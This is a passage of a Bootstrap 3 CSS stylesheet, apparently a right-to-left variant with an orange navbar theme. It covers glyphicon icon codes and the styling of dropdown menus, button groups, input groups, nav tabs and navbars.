  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-right: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-top: 4px solid \9;
  border-left: 4px solid transparent;
  border-right: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  right: 0;
  z-index: 1000;
  display: none;
  float: right;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  font-size: 14px;
  text-align: right;
  list-style: none;
  background-color: #444444;
  background-clip: padding-box;
  border: 1px solid #444444;
  border-radius: 0;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
}
.dropdown-menu.pull-right {
  left: 0;
  right: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: 400;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #373737;
  outline: 0;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  left: 0;
  right: auto;
}
.dropdown-menu-left {
  left: auto;
  right: 0;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  left: 0;
  right: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  content: "";
  border-top: 0;
  border-bottom: 4px dashed;
  border-bottom: 4px solid \9;
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    left: 0;
    right: auto;
  }
  .navbar-right .dropdown-menu-left {
    left: auto;
    right: 0;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: right;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-right: -1px;
}
.btn-toolbar {
  margin-right: -5px;
}
.btn-toolbar .btn,
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: right;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-right: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-right: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn-group {
  float: right;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-left: 8px;
  padding-right: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-left: 12px;
  padding-right: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-right: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-right: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  display: table-cell;
  float: none;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  right: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-left: 0;
  padding-right: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: right;
  width: 100%;
  margin-bottom: 0;
}
.input-group .form-control:focus {
  z-index: 3;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: 400;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.input-group-addon:first-child {
  border-left: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group-addon:last-child {
  border-right: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-right: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-left: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  z-index: 2;
  margin-right: -1px;
}
.nav {
  padding-right: 0;
  margin-bottom: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #ff8800;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: right;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-left: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0 0 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  cursor: default;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  right: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-left: 0;
  border-radius: 0;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: right;
}
.nav-pills > li > a {
  border-radius: 0;
}
.nav-pills > li + li {
  margin-right: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #ff8800;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-right: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  right: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-left: 0;
  border-radius: 0;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: right;
  }
}
.navbar-collapse {
  padding-left: 20px;
  padding-right: 20px;
  overflow-x: visible;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-left: 0;
    padding-right: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  left: 0;
  right: 0;
  z-index: 1030;
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-left: -20px;
  margin-right: -20px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-left: 0;
    margin-right: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-brand {
  float: right;
  height: 55px;
  padding: 17.5px 20px;
  font-size: 18px;
  line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-right: -20px;
  }
}
.navbar-toggle {
  position: relative;
  float: left;
  padding: 9px 10px;
  margin-left: 20px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 25px 5px 15px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: right;
    margin: 0;
  }
  .navbar-nav > li {
    float: right;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  padding: 10px 20px;
  margin-left: -20px;
  margin-right: -20px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-right: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-right: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    border: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: right;
    margin-left: 20px;
    margin-right: 20px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: right !important;
  }
  .navbar-right {
    float: left !important;
    margin-left: -20px;
  }
  .navbar-left ~ .navbar-right {
    margin-left: 0;
  }
}
.navbar-default {
  background-color: #ff8800;
  border-color: #e67a00;
}
.navbar-default .navbar-brand {
  color: #ffffff;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #e6e6e6;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #ffffff;
}
.navbar-default .navbar-nav > li > a {
  color: #ffffff;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffffff;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-toggle {
  border-color: #ff8800;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #ff8800;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #e67a00;
}
.navbar-default .navbar-link {
  color: #ffffff;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #ffffff;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
